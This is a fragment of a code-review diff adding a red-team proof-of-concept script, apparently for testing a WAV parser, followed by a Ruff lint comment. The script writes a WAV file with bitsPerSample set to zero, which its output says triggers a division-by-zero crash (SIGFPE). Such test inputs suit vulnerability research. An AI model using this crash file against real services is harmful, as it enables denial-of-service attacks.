tests/redteam/poc_wav_divzero.py

```
@@ -0,0 +1,49 @@
+    # Fix RIFF size
+    struct.pack_into('<I', b, riff_size_pos, len(b) - 8)
+    return bytes(b)
+
+def main():
+    output = sys.argv[1] if len(sys.argv) > 1 else 'poc_divzero.wav'
+    wav = build_wav(bits_per_sample=0)
+    with open(output, 'wb') as f:
+        f.write(wav)
+    sz = os.path.getsize(output)
+    print(f"[+] PoC: {output} ({sz} bytes)")
+    print(f"[+] bitsPerSample=0 → dataSize/(0/8) → SIGFPE → crash")
```

Ruff (0.15.9)

[error] f-string without any placeholders

Remove extraneous `f` prefix

(F541)